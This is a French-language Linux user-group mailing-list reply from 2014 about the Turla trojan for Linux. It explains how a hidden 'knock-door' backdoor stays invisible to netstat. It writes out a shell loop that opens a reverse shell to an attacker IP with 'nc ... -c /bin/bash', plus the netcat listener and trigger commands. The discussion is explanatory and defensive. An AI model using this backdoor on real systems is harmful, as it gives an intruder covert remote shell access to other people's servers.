[gull] Trojan Turla for Linux

felix felix at f-hauri.ch
Wed Dec 17 18:55:32 CET 2014 

On Wed, Dec 17, 2014 at 03:45:05PM +0100, Daniel Cordey wrote:
> On mer, 2014-12-17 at 12:09 +0100, felix wrote:
> 
> > Sans chercher à affoler tous le monde...
> 
> Faut quand meme reunir quelques conditions... non ? Ou bien j'ai loupe
> quelque chose ? Ce qui peut parfaitement ariver :-)

Ben, 'faut commencer par le laisser entrer, mais n'importe quelle faille
PHP ou autre permettant un ``remote exploit'' peut le faire.

> >   $ while :;do netstat -n | grep -q $myfixedip:22 &&
> >         nc $myfixedip 80 -c /bin/bash ; done
> 
> Et bibi n'ayant pas de port 22... 
Cela peut être 80, 1149, 25 ou autre... juste un port bindé normallement.
On s'en fiche, tant que $myfixedip n'a rien à priori à y faire...
(nb: $myfixedip est l'ip privée, fixe du pirate, ou une plage d'IP
 appartenant au pirate...)

> >   dans une console:
> >   $ nc -l -p 80
> 
> Ouai, je listen... 
> 
> >   et dans une autre:
> >   $ nc -w 3 $targethost 22

... et donc ``nc -w 3 $targethost 80, 1149, 25 ou autre...'' ;-)



> Et pourquoi ce timeout ?
Parce que cette connection ne sert que de ``knock door''. Pour déclancher
la suite du script, à savoir ``nc $myfixedip 80 -c /bin/sh''. Cette connection
est donc totallement bidon, elle doit juste durer plus d'une seconde (tiens,
j'ai oublié un ``sleep 1'' dans le shell, avant le ``done''.)


> >  - il n'a pas de port ouvert en listen.
> 
> Oui, mais une connexion est etablie en TCP en sortie... non ? je peux
> donc la voir avec netstat... toujours non ?
Oui, si la connexion est établie, oui. Mais si personne n'est connecté, la
``knock-door'' est prête et fonctionnelle, mais reste invisible!

> >  - la connexion se faisant de l'intérieur vers un port 80 à l'extérieur,
> >    elle passera pour une simple connection ``surf''.

> Sur une machine qui n'a pas de browser... ca parait vite douteux... il
> me semble
Ok, c'est sûr que les virus ont de toutes façons peu de chance sur tes systèmes
(particuliers).

Mais dans le cas de serveurs web simples, des PHP qui font des requêtes http
ailleur, c'est courant.

Sans parler des systèmes de mises-à-jour automatiques pour CMS ou autre
produit susceptible d'être installé pas des webmasters...

-- 
 Félix Hauri  -  <felix at f-hauri.ch>  -  http://www.f-hauri.ch

More information about the gull mailing list